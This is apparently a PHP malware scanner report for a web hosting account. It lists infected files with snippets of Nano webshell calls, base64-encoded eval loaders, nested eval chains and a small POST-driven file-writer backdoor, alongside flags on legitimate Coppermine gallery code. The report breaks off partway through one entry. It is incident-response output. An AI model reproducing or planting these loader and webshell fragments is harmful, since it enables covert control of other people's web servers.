| Exploit nano Line: 434 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[12]($BL)
| Exploit nano Line: 489 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[12]("{$Jd}/{$_POST["n"]}")
| Exploit nano Line: 491 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[15]("{$Jd}/{$_POST["n"]}")
| Exploit nano Line: 514 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[13]("{$Jd}/{$_POST["n"]}", $_POST["ctn"])
| Exploit nano Line: 534 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[16]($Jd . "/" . jD($_GET["n"])
| Exploit nano Line: 547 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[14]($Jd . "/" . jD($_GET["n"])
| Exploit nano Line: 556 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[13]($Jd . "/" . jD($_GET["n"])
| Exploit nano Line: 572 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[14]($Jd . "/" . jd($_GET["n"])
| Exploit nano Line: 591 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[5]($G3($Jd)
| Exploit nano Line: 593 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[6]("{$Jd}/{$yf}")
| Exploit nano Line: 604 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[19]("Y-m-d H:i", $c8[20]("{$Jd}/{$yf}")
| Exploit nano Line: 608 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[8]("{$Jd}/{$yf}")
| Exploit nano Line: 610 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[9]("{$Jd}/{$yf}")
| Exploit nano Line: 640 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[7]("{$Jd}/{$F1}")
| Exploit nano Line: 645 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[10]("{$Jd}/{$F1}")
| Exploit nano Line: 658 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[19]("Y-m-d H:i", $c8[20]("{$Jd}/{$F1}")
| Exploit nano Line: 662 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[8]("{$Jd}/{$F1}")
| Exploit nano Line: 664 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[9]("{$Jd}/{$F1}")
| Exploit nano Line: 78 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[2]()
| Exploit nano Line: 82 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[3](Jd($_GET["p"])
| Sign 963e968a Line: 328 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
|
|
/custdata02/turtle/public_html/ryan-and-lisa/searchnew.php Size: 29.72 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Dangers: 1
|
/custdata02/turtle/public_html/ryan-and-lisa/showthumb.php Size: 4.38 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1
| Description | Match |
|---|
Function passthru Warning Potentially dangerous function `passthru` [https://www.php.net/passthru] | <?php passthru("{$CONFIG['impath']}convert -quality $CONFIG[jpeg_qual] -antialias -geometry {$destWidth}x{$destHeight} $src_file -"); break; case "gd2": if ($imginfo[2] == GIS_GIF && $CONFIG['GIF_support'] == 1) { $src_img = imagecreatefromgif($src_file); } elseif ($imginfo[2] == GIS_JPG) { $src_img = imagecreatefromjpeg($src_file); } else { $src_img = imagecreatefrompng($src_file); } if ($imginfo[2] == GIS_GIF) { $dst_img = imagecreate($destWidth, $destHeight); } else { $dst_img = imagecreatetruecolo...
|
|
/custdata02/turtle/public_html/ryan-and-lisa/install.php Size: 86.51 kB Created: 2012-10-14 07:50:03 Modified: 2024-06-02 06:32:49 Warns: 2
| Description | Match |
|---|
Exploit infected_comment Line: 2216 Warning Comments composed by 5 random chars usually used to detect if a file is infected yet | <?php /*color*/
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] | <?php exec($command, $exec_output, $exec_retval); $version = @$exec_output[0] . @$exec_output[1]; if ($version != '') { if (preg_match('/ /', $path)) { $path = str_replace(array('.exe', '"'), '',$path); $path = substr($path, 0, (strlen($path) - 7)); $GLOBALS['error'] = sprintf($language['im_path_space'], $path); return false; } $tst_image = "albums/userpics/im.gif"; exec ("$path images/coppermine-logo.png $tst_image", $output, $result); $size = cpgGetimagesize($tst_image); @unlink($tst_image); $im_ins...
|
|
/custdata02/turtle/public_html/ryan-and-lisa/install_classic.php Size: 27.42 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:32:49 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] | <?php exec ("{$_POST['impath']}convert images/coppermine-logo.png $tst_image", $output, $result); $size = getimagesize($tst_image); unlink($tst_image); $im_installed = ($size[2] == 1); if (!$im_installed) $errors .= "<hr /><br />The installer found the ImageMagick 'convert' program in '{$_POST['impath']}', however it can't be executed by the script.<br /><br />
You may consider using GD instead of ImageMagick.<br /><br />"; if ($result && count($output)) { $err...
| Sign 0f37c730 Line: 75 Dangerous Malware Signature (hash: 0f37c730) | <?php mysql_connect($_POST['dbserver'], $_POST
|
|
/custdata02/turtle/public_html/ryan-and-lisa/xp_publish.php Size: 36.45 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:35:12 Dangers: 1
| Description | Match |
|---|
Exploit download_remote_code2 Line: 156 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite(fopen(LOGFILE, 'w'), $ob);
}
exit;
}
// Quote a string in order to make a valid JavaScript string
function javascript_string($str)
{
// replace \ with \\ and then ' with \'.
$str = str_replace('\\', '\\\\', $str);
$str = str_replace('\'', '\\\'', $str);
return $str;
}
// Return the HTML code for the album list select box
function html_album_list(&$alb_count)
{
global $CONFIG, $LINEBREAK;
if (USER_IS_ADMIN) {
$public_albums =...
|
|
/custdata02/turtle/public_html/ryan-and-lisa/pic_editor.php Size: 15.43 kB Created: 2012-10-14 07:50:07 Modified: 2024-06-02 06:35:12 Warns: 2
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'R0lGODlhGQAZAMQAAP///+zv8t3h5tXc5NbW1s/V3dHS08XN1cPK0cLDw8HCw7y+wLW1ta+0u66yuKurrJmZmf///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAUUABEALAAAAAAZABkAAAWhYCSOZGlGCQCc7JmubSy+skzX5xAYKm4OAsLNJyrsIo8eMaJTiBhKH9AgciyiNSM10jgMZc2qFtuaihqF4JelPR+OSVg54Iw4jIknuWTmprdWeyNtXG9bXWsjYXZ4YjuCfWgCh2lCe4RdR4VwZIt3AXmMoHpyTAOUk2d/Z1elAQRVb7B2smcILwm5CQYJDwwLu72/wb7ALyrIycrLzM3OyyEAOw=='
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval('($json_vars)');</script>" . $LINEBREAK; ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="imagetoolbar" content="no" />
<meta http-equiv="content-type" content="text/html; charset=<?php echo $CONFIG['charset'] == 'language file' ? $lang_charset : $CONFIG['charset'] ?>" />
<title><?php echo $lang_editpics_php['crop_title'] ?></title>
<?php if($imgObj){ echo $json_s...
|
|
/custdata02/turtle/public_html/scullycommercial.com/resources/library/template_functions.php Size: 765.00 B Created: 2010-08-23 22:29:23 Modified: 2024-06-02 06:32:49 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 11 Warning Double var technique is usually used for the obfuscation of malicious code | <?php ${$key}
|
|
/custdata02/turtle/public_html/scullycommercial.com/4yJaMCGog1X.php Size: 43.44 kB Created: 2024-06-01 02:24:50 Modified: 2024-06-01 08:12:21 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKHN2CjspKSk4LSAsbjBrMCwnAACnIv/IEUI...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($DiNjf($zrfJC($PcQnr($kNdXC('R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKH...
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php NVCh
| Sign ae7830db Line: 1 Dangerous Malware Signature (hash: ae7830db) | <?php y2HY
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/scullycommercial.com/T6vRJyM2GxK.php Size: 51.36 kB Created: 2024-06-01 02:24:50 Modified: 2024-06-01 08:12:21 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($WBZyL($AlFWd($WQIKf('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php n0CL
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/scullycommercial.com/hoemHAxMtNS.php Size: 43.48 kB Created: 2024-06-04 19:34:29 Modified: 2024-06-04 19:34:29 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYWhzIShzdgo7KSkpOC0gLG4wazAsJwAApyL...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($SIunp($udwGf($IgvuO($xqlbS('QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYW...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/scullycommercial.com/J5sAKYDV1lG.php Size: 166.77 kB Created: 2024-06-04 19:34:29 Modified: 2024-06-04 19:34:29 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/public_html/scullycommercial.com/k36RrMTWqdC.php Size: 51.81 kB Created: 2024-06-04 19:34:29 Modified: 2024-06-04 19:34:29 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5Rg5VpBJefHMVmPCYH6B...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($MuUwa($tIRhZ('VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5...
| Function strrev eval_strrev Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php LAve
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php N0YX
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/scullycommercial.com/SNrJKDOGlMz.php Size: 38.68 kB Created: 2024-06-04 19:34:29 Modified: 2024-06-04 19:34:29 Warns: 1
| Description | Match |
|---|
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦ø][0x00008])))))))))))))))))))
|
|
/custdata02/turtle/public_html/scullycommercial.com/theme-instenp.php Size: 338.00 B Created: 2024-06-04 19:34:29 Modified: 2024-06-04 19:34:29 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/scullycommercial.com/69uSn7wzcNh.php Size: 43.51 kB Created: 2024-06-04 19:51:05 Modified: 2024-06-04 19:51:05 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3sTfsf/gP8/g3TuZHT/YfoP6f/GZv8/UJH...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($fpwQi($fCjKH($LElTj($HJrhk('eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/scullycommercial.com/SzGJyqjXwW3.php Size: 166.77 kB Created: 2024-06-04 19:51:05 Modified: 2024-06-04 19:51:05 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/public_html/scullycommercial.com/xoAlzmWyPIB.php Size: 51.33 kB Created: 2024-06-04 19:51:05 Modified: 2024-06-04 19:51:05 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($UbskV($gbWJv($UMwGZ('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php n0CL
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/scullycommercial.com/YHErqBetbm8.php Size: 38.68 kB Created: 2024-06-04 19:51:05 Modified: 2024-06-04 19:51:05 Warns: 1
| Description | Match |
|---|
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦ø][0x00008])))))))))))))))))))
|
|
/custdata02/turtle/public_html/scullycommercial.com/theme-insribd.php Size: 338.00 B Created: 2024-06-04 19:51:05 Modified: 2024-06-04 19:51:05 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/suspended.page/Kz9gFdEURfa.php Size: 43.44 kB Created: 2024-06-01 02:25:11 Modified: 2024-06-01 08:12:22 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKHN2CjspKSk4LSAsbjBrMCwnAACnIv/IEUI...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($DiNjf($zrfJC($PcQnr($kNdXC('R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKH...
| Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6) | <?php NVCh
| Sign ae7830db Line: 1 Dangerous Malware Signature (hash: ae7830db) | <?php y2HY
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/suspended.page/pq3gUuxQPAB.php Size: 51.36 kB Created: 2024-06-01 02:25:11 Modified: 2024-06-01 08:12:22 Warns: 2 Dangers: 2
| Description | Match |
|---|
